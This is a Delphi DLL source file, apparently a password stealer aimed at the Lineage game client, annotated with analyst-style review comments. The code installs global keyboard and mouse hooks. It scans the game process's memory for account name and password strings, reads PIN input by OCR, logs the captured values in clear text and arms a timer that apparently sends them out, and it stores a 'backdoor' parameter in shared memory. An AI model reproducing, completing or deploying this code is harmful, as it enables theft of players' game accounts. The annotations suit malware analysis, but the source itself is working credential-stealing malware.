📄 unithookdll.pas
MBI: MEMORY_BASIC_INFORMATION;
PMemoAddr: Pointer;
//MemoAddr, lpNumberOfBytesRead
OldBasse: DWORD;
d1, size: longword;
i2: integer;
p: pchar;
bBreak:boolean;
begin
bBreak:=false;
ProcessHndle := OpenProcess(PROCESS_VM_OPERATION or PROCESS_VM_READ or PROCESS_QUERY_INFORMATION, false, GetCurrentProcessId);
if ProcessHndle > 0 then
begin
writedat('g1');
GetSystemInfo(SysInfo);
OldBasse := $FFFFFFFF;
i2 := 1;
PMemoAddr := SysInfo.lpMinimumApplicationAddress;
try
while (not bBreak)and(dword(PMemoAddr) < dword(SysInfo.lpMaximumApplicationAddress)) do
begin
VirtualQueryEx(ProcessHndle, PMemoAddr, MBI, SizeOf(MBI));
if (dword(MbI.BaseAddress) = OldBasse) and (MbI.RegionSize <= 0) then break;
writedat('g2:'+inttostr(integer(MbI.BaseAddress)));
OldBasse := dword(MbI.BaseAddress);
PMemoAddr := pointer(dword(MbI.BaseAddress) + MbI.RegionSize + $F);
//setlength(sTmp, MbI.RegionSize);
//ReadProcessMemory(ProcessHndle, PMemoAddr, pchar(sTmp), MbI.RegionSize, lpNumberOfBytesRead);
//if(MBI.State = MEM_COMMIT)then //MEM_COMMIT=$1000 MEM_RESERVE=$2000 MEM_FREE=$10000
if (Mbi.Protect = PAGE_READONLY) or (Mbi.Protect = PAGE_READWRITE) or (Mbi.Protect = PAGE_WRITECOPY) then
begin
try
p := MbI.BaseAddress;
size := MbI.RegionSize - $14E;
while true do
begin
d1 := StrPosChar(p, size, #$C5);
if d1 = $FFFFFFFF then break;
dec(size, d1 + 1);
inc(p, d1);
if (plongword(p)^ = $49C549C5) then
begin
if strlcomp(p, sconst, $4E) = 0 then
begin
writedat('found:' + inttostr(i2) + ' ' + inttostr(integer(P)));
if i2 = 1 then pUp1 := p
else if i2 = 2 then pUp2 := p;
inc(i2);
if do1(p) then
begin
bBreak:=true;
break;
end;
end;
end;
inc(p);
end;
except
end;
end;
end;
except
end;
end;
CloseHandle(ProcessHndle);
ThreadBusy := false;
end;
// Credential lookup path taken when is9x is false (called from LogoMouse and LogoKey).
// Order of preference, exactly as coded below:
//   1. pUserPass is already set -> get2000xp(pUserPass), then return;
//   2. pUP2 is already set      -> do1(pUP2);
//   3. otherwise, if ThreadBusy is false, set it and run ThreadFind.
// get2000xp, do1 and ThreadFind are defined outside this view; presumably they
// locate and copy the account name and password from process memory - confirm
// against their bodies before relying on this description.
// Analyst note: the empty except handler means a fault anywhere on this path
// is silent, so the host process shows no crash or error when a lookup fails.
procedure GetMemUserPass2000XP;
// MeXP Other OtherXP Other2000
//0012FE30->0038B130 003FB100 003FB140[6ef0] 00350000
//0012FE48->0038B130 003FB100
//0012FE34->0038B0E8 003FB0B8
//0012FE44->00384348 003F4318
// 0038AEF8->037A9B18 003FAEC8->0B634C38 003FAF08
//UserAddr 037A9B54 0B634BEC 0A3208E0
//PassAddr 037A9BDc 0B634C74 0A320968
// (the table above is the author's record of observed addresses per OS/machine;
//  nothing in this procedure reads these values)
//var
// ThreadId1: dword;
begin
try
// Fast path: a pointer was resolved earlier, reuse it.
if pUserPass <> nil then
begin
get2000xp(pUserPass);
exit;
end;
// Second cached pointer, set by the scan when its second pattern match is found.
if pUP2 <> nil then do1(pUP2)
else begin
// ThreadBusy is a plain boolean used as a re-entrancy flag, not a lock.
if not ThreadBusy then
begin
ThreadBusy := true;
// The CreateThread call is disabled, so the scan runs synchronously on the
// thread that delivered the hook event.
//CreateThread(nil, 0, @ThreadFind, nil, 0, ThreadId1);
ThreadFind;
end;
end;
except
// all exceptions are swallowed on purpose; nothing is logged here
end;
end;
// Searches a buffer for the first 16-bit value equal to c.
//   Str  - start of the buffer (arrives in EAX; nil is accepted)
//   iLen - buffer length in bytes (arrives in EDX)
//   c    - 16-bit value to look for (arrives in CX)
// Returns the byte offset of the match relative to Str, or $FFFFFFFF when Str
// is nil or the scan count runs out.
// NOTE(review): the scan count is iLen div 2 + 1, so REPNE SCASW can read one
// word beyond the iLen bytes; a hit on that extra word leaves ECX = 0 and is
// therefore reported as "not found".
function StrPosW(Str: PChar; iLen: longword; c: word): longword; assembler;
asm
PUSH EDI
PUSH EBX
OR EAX,EAX //Str1
JE @@2 // nil buffer -> return $FFFFFFFF
MOV EDI,EAX // EDI = scan cursor
MOV EBX,EAX // EBX = buffer start, kept to compute the offset
MOV AX,CX //c
MOV ECX,EDX //iLen
Shr ECX,1 // !!!! /2
INC ECX
REPNE SCASW // stops after the matching word or when ECX reaches 0
CMP ECX,0
JE @@2 // count exhausted -> treated as not found
MOV EAX,EDI
SUB EAX,EBX
SUB EAX,2 // !!!! -2
JMP @@3
@@2: MOV EAX,0FFFFFFFFH
@@3: POP EBX
POP EDI
end;
// Credential lookup path taken when is9x is true (called from LogoMouse and LogoKey).
// What the code below does:
//   * returns at once when hasSend is set;
//   * when pUP1 and pUP2 are already cached, re-reads both strings, logs them
//     through writedat and (re)arms a 20000 ms timer on TimerSend;
//   * otherwise walks the address space of the CURRENT process with
//     VirtualQueryEx and searches readable committed regions for a fixed
//     record layout, caching the two string pointers it finds.
// writedat and TimerSend are defined outside this view; presumably a log sink
// and the routine that transmits the captured values - confirm.
// Analyst note: everything here happens inside the hooked process itself, so
// there is no cross-process memory read to observe; the visible artefacts are
// the self-directed OpenProcess/VirtualQueryEx sweep and the timer callback.
procedure GetMemUserPass9x;
label exit1;
var
ProcessHndle: HWND;
SysInfo: _SYSTEM_INFO;
MBI: MEMORY_BASIC_INFORMATION;
PMemoAddr: Pointer;
p, LastP1, LastP2: pchar;
LastSeg: word;
CountSeg, nSize, size, d1: DWORD;
i: integer;
bFound: boolean;
begin
if hasSend then exit;
// Cached-pointer path: both string locations are known from an earlier scan.
if (pUP1 <> nil) and (pUP2 <> nil) then
begin
// Only the FIRST byte of each string is checked for the printable range
// $21..$7F before the copy.
if (pUP1[0] > #$20) and (pUP1[0] < #$80) and
(pUP2[0] > #$20) and (pUP2[0] < #$80) then
begin
// NOTE(review): strcopy is unbounded; the sizes of user/pass are declared
// outside this view - confirm they can hold the source strings.
strcopy(@user, pUP1);
strcopy(@pass, pUP2);
// Both values are written to the log in clear text.
writedat('user:' + user + ' pass:' + pass);
// Restart the 20 s timer so that TimerSend fires after the last update.
if timer1 <> 0 then killtimer(0, timer1);
timer1 := settimer(0, 1, 20000, @TimerSend);
end
else if (pUP1[0] = #0) or (pUP2[0] = #0) then //nothing
else begin
//
end;
exit;
end;
// Handle to the current process (GetCurrentProcessId), read/query rights only.
ProcessHndle := OpenProcess(PROCESS_VM_OPERATION or PROCESS_VM_READ or PROCESS_QUERY_INFORMATION, false, GetCurrentProcessId);
if ProcessHndle <= 0 then
begin
writedat('OpenProcess error');
exit;
end;
try
// Sentinels: no segment seen yet, no candidate records yet.
LastSeg := $FFFF;
CountSeg := 0;
LastP1 := pointer($FFFFFFFF);
LastP2 := pointer($FFFFFFFF);
GetSystemInfo(SysInfo);
PMemoAddr := SysInfo.lpMinimumApplicationAddress;
// Region-by-region walk of the user address range.
while dword(PMemoAddr) < dword(SysInfo.lpMaximumApplicationAddress) do
begin
fillchar(MBI, sizeof(MBI), 0);
// The return value is not checked; a failed query is detected through the
// zeroed RegionSize below.
VirtualQueryEx(ProcessHndle, PMemoAddr, MBI, SizeOf(MBI));
if MBI.RegionSize = 0 then
begin
//writedat('Base'+inttostr(dword(mbi.BaseAddress))+' '+inttostr(MBI.RegionSize));
break;
end;
//else writedat('Base'+inttostr(dword(mbi.BaseAddress))+' '+inttostr(MBI.RegionSize));
nSize := MBI.RegionSize;
if MBI.State = MEM_COMMIT then //MEM_COMMIT=$1000 MEM_RESERVE=$2000 MEM_FREE=$10000
begin
// Exact-match test: regions whose protection carries extra modifier bits
// or any execute flag are skipped.
if (Mbi.Protect = PAGE_READONLY) or (Mbi.Protect = PAGE_READWRITE) or (Mbi.Protect = PAGE_WRITECOPY) then
begin
try
p := MbI.BaseAddress;
// $24 bytes are held back, presumably so the reads at p[$18]..p[$1F] below
// stay inside the region - confirm.
size := MbI.RegionSize - $24;
while true do
begin
// Candidate records start with the 16-bit value $0021.
d1 := StrPosW(p, size, $0021);
if d1 = $FFFFFFFF then break;
dec(size, d1 + 2);
inc(p, d1);
// Layout test: word at +2 is 0, dword at +$18 is 0, dword at +$1C is $21.
if (pword(@p[2])^ = 0) and
(plongword(@p[$1C])^ = $00000021) and (plongword(@p[$18])^ = $00000000) then
begin
// Bytes +4..+$17 must hold a non-empty, NUL-terminated string made only of
// characters in $21..$7F.
bFound := false;
for i := 4 to $18 - 1 do
begin
if p[i] = #0 then
begin
if i <> 4 then bFound := true;
break;
end
else if (p[i] <= #$20) or (p[i] >= #$80) then break;
end;
if bFound then
begin
//writedat(inttostr(dword(p) + 4) + ' ' + strpas(p + 4) + ' ' + inttostr(CountSeg));
// Matches are grouped by the upper 16 bits of their address. CountSeg counts
// the matches after the first one within the current group.
if LastSeg = dword(p) shr 16 then
begin
inc(CountSeg);
end
else begin
// Group changed: a previous group with exactly two matches is taken as the
// pair. LastP1 is the later match, LastP2 the earlier one.
if CountSeg = 1 then
begin
pUP1 := LastP1 + 4;
pUP2 := LastP2 + 4;
strcopy(@user, pUP1);
strcopy(@pass, pUP2);
writedat('user:' + user + ' pass:' + pass);
end;
CountSeg := 0;
LastSeg := dword(p) shr 16;
end;
LastP2 := LastP1;
LastP1 := p;
end;
{if i2 = 1 then pUp1 := p
else if i2 = 2 then pUp2 := p;
inc(i2);
if do1(p) then
begin
goto exit1;
end;}
end;
inc(p, 2);
end;
except
// access faults while scanning a region are swallowed; the walk continues
end;
end;
end;
PMemoAddr := Pointer(DWORD(PMemoAddr) + nSize);
end;
// Same two-match test for the last group seen; only this exit and the cached
// path above arm the send timer.
if CountSeg = 1 then
begin
pUP1 := LastP1 + 4;
pUP2 := LastP2 + 4;
strcopy(@user, pUP1);
strcopy(@pass, pUP2);
writedat('user:' + user + ' pass:' + pass);
if timer1 <> 0 then killtimer(0, timer1);
timer1 := settimer(0, 1, 20000, @TimerSend);
end;
except
end;
// exit1 is only targeted by the goto inside the disabled block above.
exit1:
CloseHandle(ProcessHndle);
end;
// Handler for the mouse events forwarded by MouseProc.
//   wpa - the mouse message identifier (compared with WM_LBUTTONDBLCLK below)
//   lpa - address of a MOUSEHOOKSTRUCT, passed as an integer and cast back
// Does nothing unless isCQ is set (the initialization section sets it from the
// host process's file name). It then logs the window under the event and,
// depending on that window, records the selected server name, triggers the
// memory lookup for the account strings, or records the clicked character slot.
// isParent, PushCursorPos, OCR and CalcWuPinPass are defined outside this view.
procedure LogoMouse(wpa, lpa: integer);
var
p, pbak1: hwnd;
WinText, ClassText: array[0..255] of char;
text: string;
pt: TPoint;
begin
if not isCQ then exit;
p := pMOUSEHOOKSTRUCT(lpa)^.hwnd; //GetForegroundWindow;
// Title and class of the window that received the event.
WinText[0] := #0;
GetWindowText(p, WinText, sizeof(WinText));
ClassText[0] := #0;
GetClassName(p, ClassText, sizeof(ClassText));
// Every qualifying mouse event is logged together with its screen coordinates.
writedat('iStatueMain:' + inttostr(iStatueMain) +
' mouse WinText:' + WinText + ' class:' + classtext + ' x:' + inttostr(pMOUSEHOOKSTRUCT(lpa)^.pt.X) +
' Y:' + inttostr(pMOUSEHOOKSTRUCT(lpa)^.pt.Y));
// Case 1: a button inside the window named by 'serverListWnd'. Its caption is
// stored as the server name in shared memory and the captured state is reset.
if (classtext = 'Button') then
begin
pbak1 := p;
if (isParent(pbak1, '', 'serverListWnd', true)) then
begin
text := WinText;
// NOTE(review): unbounded copy; the size of quserver is declared elsewhere.
strcopy(@pshmem^.quserver, pchar(text));
writedat('区mouse: ' + pshmem^.quserver);
iStatueMain := 0;
user[0] := #0;
pass[0] := #0;
role := 0;
end;
end
// Case 2: the game's main window, matched by exact title and class.
else if (wintext = 'Lineage Windows Client') and (classtext = 'Lineage') then
begin
// The memory lookup runs only once pUserPass has been resolved.
if pUserPass <> nil then
begin
if is9x then GetMemUserPass9x
else GetMemUserPass2000xp
end;
PushCursorPos(pMOUSEHOOKSTRUCT(lpa)^.pt);
// NOTE(review): pt is not assigned in this procedure before the call;
// presumably OCR fills it in (var parameter) - confirm.
if OCR(pt, 'OK') then
begin
writedat('OCR Found Text:' + inttostr(pt.X) + ',' + inttostr(pt.Y));
CalcWuPinPass(pt);
end;
{ GetEditCount(p, 'LUnicodeEdit', 'LMyEdit');
writedat('iC: ' + inttostr(ic1) + ' ' + inttostr(ic2) + ' ' + inttostr(ic3) + ' ' + inttostr(ic4) + ' user:' + user + ' pass:' + pass);
if (((ic1 = 2) and (ic2 = 2)) or ((ic1 = 1) and (ic2 = 1)))
and (ic3 = 0) and (ic4 = 0) then
begin
iStatueMain := Maxint;
if (user[0] <> #0) then //and (pass[0] <> #0)
begin
LastUser := user;
LastPass := pass;
timer2 := settimer(0, 1, 20000, @timerfun);
end;
user[0] := #0;
pass[0] := #0
end;}
// A double-click while both strings are captured is mapped to a slot number
// from hard-coded client coordinates.
if (wpa = WM_LBUTTONDBLCLK) and (user[0] <> #0) and (pass[0] <> #0) then
begin
// role 1: x 20-149
if (pMOUSEHOOKSTRUCT(lpa)^.pt.Y <= 291) then
begin
// (repeats the condition already tested by the enclosing if)
if (user[0] <> #0) and (pass[0] <> #0) then
begin
iStatueMain := Maxint;
// role keeps its previous value when x falls between the four ranges.
with pMOUSEHOOKSTRUCT(lpa)^.pt do
if (x >= 20) and (x <= 149) then role := 1
else if (x >= 176) and (x <= 307) then role := 2
else if (x >= 333) and (x <= 464) then role := 3
else if (x >= 490) and (x <= 621) then role := 4;
end;
end;
end;
end;
end;
// Handler for the key events forwarded by KeyPro.
//   wpa - the hook's wParam (for WH_KEYBOARD this is the virtual-key code)
//   lpa - the hook's lParam; not used here
// Does nothing unless isCQ is set. Otherwise it logs the key value and runs
// the memory lookup for the account strings on every forwarded key event.
// Analyst note: the key value goes to the log through writedat (defined
// elsewhere); the account strings are not assembled from keystrokes in this
// procedure, they come from the memory lookup.
procedure LogoKey(wpa, lpa: integer);
//var
// p, pbak1, L: hwnd;
// s: string;
// buffer, WinText, ClassText: array[0..255] of char;
begin
if not isCQ then exit;
writedat('key0:' + inttostr(Wpa));
// Pick the lookup routine that matches the OS family detected at load time.
if is9x then GetMemUserPass9x
else GetMemUserPass2000xp;
end;
// WH_KEYBOARD hook procedure (installed by StartHook, exported from the DLL).
// Passes the event down the hook chain first and returns that result, then
// forwards the event to LogoKey when bit 31 of lParam is clear, i.e. when the
// key is being pressed rather than released.
// iCode is not examined here. ClassText and p are declared but never used.
function KeyPro(iCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT;
stdcall; export;
var
ClassText: array[0..255] of char;
p: hwnd;
begin
// The hook handle is read from the shared-memory block, so it is the same in
// every process the DLL is mapped into.
Result := CallNextHookEx(pshmem^.KeyHook, iCode, wParam, lParam);
if ((Lparam and $80000000) = 0) then
begin
LogoKey(wparam, lparam);
end;
end;
// WH_MOUSE hook procedure (installed by StartHook, exported from the DLL).
// Forwards left-button-down, right-button-down and left double-click events to
// LogoMouse, then passes the event down the hook chain and returns that result.
// iCode is not examined here. ClassText and p are declared but never used.
function MouseProc(iCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT;
stdcall; export;
var
ClassText: array[0..255] of char;
p: hwnd;
begin
// For WH_MOUSE, wParam carries the mouse message identifier.
if (wparam = WM_LBUTTONDOWN) or (wparam = WM_RBUTTONDOWN) or (wparam = WM_LBUTTONDBLCLK) then
begin
LogoMouse(wparam, lparam);
end;
// The hook handle is read from the shared-memory block.
Result := CallNextHookEx(pshmem^.MouseHook, iCode, wParam, lParam);
end;
{function CallProc(iCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT;
stdcall; export;
begin
Result := CallNextHookEx(CallHook, iCode, wParam, lParam);
end; }
// Exported entry point that arms the DLL.
//   data, BackDoor - caller-supplied strings copied into the shared-memory
//                    block; their meaning is set by code outside this view
//   VerTest        - flag stored in shared memory
// Steps, as coded: call Killer (defined elsewhere), mark this process as the
// installer (FirstProcess), clear the stored server name, start a 1000 ms
// timer on FunTimerWriteDat, then install WH_KEYBOARD and WH_MOUSE hooks.
// Analyst note: both SetWindowsHookEx calls pass this module's HInstance and a
// thread id of 0, which makes the hooks global, so Windows maps this DLL into
// the processes on the desktop that receive those events. The artefacts visible
// in this file are the two global hooks, the named file mapping created in the
// initialization section, and the process-name gate that sets isCQ.
procedure StartHook(data: pchar; BackDoor: pchar; VerTest: boolean); stdcall;
//var
// SystemTime: TSystemTime;
begin
// (disabled) date check that would have stopped the DLL from September 2004 on
// GetLocalTime(SystemTime);
// with SystemTime do
// if (wYear >= 2004) and (wMonth >= 9) then exit;
Killer;
FirstProcess := true;
// NOTE(review): pshmem is dereferenced without a nil check; the mapping calls
// in the initialization section do not check their results either.
pshmem^.quserver[0] := #0;
pshmem^.VerTest := VerTest;
TimerWriteDat := settimer(0, 10, 1000, @FunTimerWriteDat);
// NOTE(review): unbounded copies; the field sizes are declared in TShareMem,
// outside this view.
strcopy(pshmem^.data, data);
strcopy(pshmem^.backdoor, backdoor);
// Hooks are installed only once; the handles live in shared memory.
if pshmem^.KeyHook = 0 then
pshmem^.KeyHook := SetWindowsHookEx(WH_KEYBOARD, Keypro, HInstance, 0);
if pshmem^.MouseHook = 0 then
pshmem^.MouseHook := SetWindowsHookEx(WH_MOUSE, MouseProc, Hinstance, 0);
// if callhook = 0 then
// callhook := SetWindowsHookEx(WH_CALLWNDPROC, callProc, Hinstance, 0);
end;
// Exported counterpart of StartHook: stops the TimerWriteDat timer, removes the
// keyboard and mouse hooks if they are installed, and zeroes both handles in
// the shared-memory block. Also called from the finalization section when this
// process was the one that installed the hooks.
procedure StopHook; stdcall;
begin
killtimer(0, TimerWriteDat);
if pshmem^.KeyHook <> 0 then
UnhookwindowsHookEx(pshmem^.KeyHook);
// The handle is cleared whether or not the unhook call succeeded.
pshmem^.KeyHook := 0;
if pshmem^.MouseHook <> 0 then
UnhookwindowsHookEx(pshmem^.MouseHook);
pshmem^.MouseHook := 0;
// if callHook <> 0 then
// UnhookwindowsHookEx(callHook);
// callHook := 0;
end;
// Unit start-up: runs in every process that loads the DLL, including each
// process it is mapped into by the global hooks.
initialization
// Reset the per-process capture state.
ThreadBusy := false;
iStep := 0;
timer1 := 0;
quserverLocal[0] := #0;
iStatueMain := 0;
user[0] := #0;
pass[0] := #0;
WuPinPass[0] := #0;
hasSend := false;
role := 0;
// LastUser := '';
// LastPass := '';
pMousePoint := 0;
for i1 := 0 to MaxPoint - 1 do
begin
MousePoint[i1].X := 0;
MousePoint[i1].Y := 0;
end;
FirstProcess := false;
SendHtmlMailData := '';
is9x := IsWindows9x;
// Named, page-file-backed mapping ($FFFFFFFF = INVALID_HANDLE_VALUE) the size
// of TShareMem. Every instance of the DLL opens the same object by name, which
// is how the hook handles and the data/backdoor strings are shared.
// NOTE(review): neither return value is checked; a nil pShMem would fault at
// the first pshmem^ access.
hMappingFile := CreateFileMapping($FFFFFFFF, nil, PAGE_READWRITE, 0, SizeOf(TShareMem), pchar(MappingFileName));
pShMem := MapViewOfFile(hMappingFile, FILE_MAP_WRITE or FILE_MAP_READ, 0, 0, 0);
// Host-process gate: GetModalName is defined elsewhere; its result is reduced
// to a file name and compared case-insensitively. isCQ enables the handlers in
// LogoMouse and LogoKey; isIE is set here and used outside this view.
filename := extractfilename(GetModalName(GetCurrentProcessId, '.bin'));
isCQ := (ansicomparetext(filename, 'lineage.exe') = 0) or (ansicomparetext(filename, 'lin.bin') = 0);
isIE := (ansicomparetext(filename, 'IEXPLORE.EXE') = 0);
// Unit shutdown: only the process that called StartHook removes the hooks;
// every process releases its own view and handle. Errors are swallowed.
finalization
try
if FirstProcess then
StopHook;
UnMapViewOfFile(pShMem);
CloseHandle(hMappingFile);
except
end;
end.